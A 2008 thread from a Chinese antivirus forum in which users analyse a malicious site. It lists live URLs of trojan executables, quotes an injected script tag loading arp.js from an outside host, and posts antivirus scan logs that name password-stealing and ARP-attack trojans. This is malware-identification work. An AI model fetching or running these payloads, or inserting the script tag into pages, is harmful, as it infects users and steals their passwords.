楼主: fhmarch666
收起左侧

[已鉴定] 一个da!da!da!的毒网啊

 关闭 [复制链接]
gaojun7206
发表于 2008-3-26 12:53:41 | 显示全部楼层
Virus: Trojan.Downloader.JS.Agent.OL
深红的雪
发表于 2008-3-26 12:57:43 | 显示全部楼层

回复 6楼 冷冷 的帖子

更新过了,文件大小也不一样

http://d.158dm.com/a0.exe
http://c.158dm.com/okok.exe
http://c.158dm.com/arps.exe

ARP
<script language=javascript src=http://a.wacsy.com/one/arp.js></script>
又挂了个hxxp://b.158dm.com/one/ok.js,恶性循环

[ 本帖最后由 rappar 于 2008-3-26 13:12 编辑 ]

3.rar

351.68 KB, 下载次数: 63

aerbeisi
发表于 2008-3-26 13:01:01 | 显示全部楼层
[Found possible security risk]         <W32/Heuristic-224!Eldorado (not disinfectable)>        c:\test\a0.exe->(NSPack)->(PE_Patch)
[Quarantined]        c:\test\a0.exe->(NSPack)->(PE_Patch)
[Found Trojan]         <W32/Trojan.ACBS (exact)>        c:\test\arps.exe->(UPX)
[Quarantined]        c:\test\arps.exe->(UPX)
挪威的冬天
发表于 2008-3-26 13:10:16 | 显示全部楼层

回复 12楼 rappar 的帖子

okok 下不了

病毒        2008-03-26  13:09:55        病毒在文件D:\Desktop\a0.exe.download中        Win32.Troj.Agent.227840        处理成功(操作:删除)       
病毒        2008-03-26  13:09:15        病毒在文件D:\Desktop\arps.exe.download中        Win32.Troj.QQPassT.a.89088        处理成功(操作:删除)
mofunzone
发表于 2008-3-26 13:24:11 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\3.rar'
C:\Documents and Settings\Administrator\My Documents\
  3.rar
    [0] Archive type: RAR
      --> a0.exe
        [1] Archive type: Runtime Packed
        --> Object
      --> arps.exe
        [1] Archive type: Runtime Packed
        --> Object
          [2] Archive type: RSRC
          --> Object
              [DETECTION] Is the Trojan horse TR/PSW.Steal.26025
              [WARNING]   Infected files in archives cannot be repaired!
    --> okok.exe
        [DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
      [NOTE]      The file was deleted!


End of the scan: 2008年3月25日  22:23
Used time: 00:04 min

The scan has been done completely.

      0 Scanning directories
      4 Files were scanned
      3 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      1 Files not concerned
      1 Archives were scanned
      1 Warnings
      1 Notes
冷冷
发表于 2008-3-26 14:03:24 | 显示全部楼层

回复 12楼 rappar 的帖子

只有arps是新的!
1.PNG
tanlimo
发表于 2008-3-26 15:08:52 | 显示全部楼层
ess扫描日志
病毒库版本: 2973 (20080326)
日期: 2008-3-26  时间: 15:12:24
已扫描的磁盘、文件夹和文件: D:\Documents and Settings\ess\桌面\3.rar
D:\Documents and Settings\ess\桌面\3.rar > RAR > a0.exe - Win32/Agent.NOS 特洛伊木马
D:\Documents and Settings\ess\桌面\3.rar > RAR > arps.exe - 可能是 Win32/PSW.Delf.NHI 特洛伊木马 的变种
D:\Documents and Settings\ess\桌面\3.rar > RAR > okok.exe - Win32/HackTool.Xarp 特洛伊木马 的变种
已扫描的对象数: 3
发现的威胁数: 3
完成时间: 15:12:25  总扫描时间: 1 秒 (00:00:01)
qigang
发表于 2008-3-26 21:57:39 | 显示全部楼层
不新,老毒网了,解过了的。
qigang
发表于 2008-3-26 21:59:22 | 显示全部楼层
原帖由 rappar 于 2008-3-26 12:57 发表
更新过了,文件大小也不一样

http://d.158dm.com/a0.exe
http://c.158dm.com/okok.exe
http://c.158dm.com/arps.exe

ARP

又挂了个hxxp://b.158dm.com/one/ok.js,恶性循环




瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.PSW.QQPass.rrp   
病毒: Hack.Win32.Xarp.f        

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.37.22
kkgh
发表于 2008-3-27 12:35:21 | 显示全部楼层
进去后诺顿杀
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 01:43 , Processed in 0.103393 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表